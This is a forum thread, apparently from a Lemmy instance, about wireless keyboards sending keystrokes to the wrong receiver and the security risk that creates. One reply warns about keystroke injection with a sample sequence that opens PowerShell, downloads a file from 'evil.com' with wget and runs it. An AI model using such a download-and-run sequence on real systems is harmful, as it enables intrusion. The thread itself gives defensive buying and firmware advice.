I aways wondered if the communication channel between my wireless keyboard and the usb receiver-antena is secure. I never bother to reseach this. Today I figured out the practical way. I turned on my pc at work and I tried to type the first letter of my password. Nothing hapened. Then I started spamming that letter. Still nothing, until the person next to me said “my keyboard is typing all by itself”. It turns out she has a wireless mouse with a seemigly identical receiver-antena usb.

The moral of the story. If it was so easy to almost leak my password unintentionally due to this flaw of wireless keyboard communication, imagine wad a bad actor can do intentionally. Why try to brute force, social engineer e.t.c. when your password can be stollen in transit from your keyboard to your pc.

  • Skull giver@popplesburger.hilciferous.nl
    link
    fedilink
    arrow-up
    33
    ·
    edit-2
    1 year ago

    This strongly depends on the brands you use. Unencrypted, automatically re-pairing devices are not normal, it just sounds like you and your coworker bought devices from questionable brands. Logitech keyboards and dongles encrypt key presses, for example. You do need to regularly check for firmware updates for both your keyboard and the receiver (sometimes vulnerabilities are found and despite the spyware Logitech wants to install onto your computer, these updates aren’t done automatically) but they’re generally quite safe.

    Something perhaps more worrying: unencrypted keyboards will also let anyone in range inject keystrokes. A simple win+r, powershell.exe, wget http://evil.com, ./evil.exe could infect your computer if you look away for just five seconds.

    These pages show how various brands deal with such security bugs: KeyJack Affected Devices, MouseJack Affected Devices. TL;DR, don’t use anything from Microsoft or AliExpress/Amazon Basics and update your firmware.

    • black_mouflon@beehaw.orgOP
      link
      fedilink
      arrow-up
      5
      ·
      edit-2
      1 year ago

      Thanks. For what kind of specs I should be looking when byuing a wireless product? What key words I should be looking for?

    • Pantherina@feddit.de
      link
      fedilink
      arrow-up
      1
      ·
      1 year ago

      Hmm, do you want a keyboard with firmware updates that encrypts keybresses…

      Or simply use USB?..

      • USB works great but you need a lot of extension cables to control your media center PC from the couch, and they’re usually not exactly up to spec either.

        I don’t use a wireless keyboard, I do have a wireless mouse for travelling, though. Sometimes wireless makes sense, sometimes it doesn’t.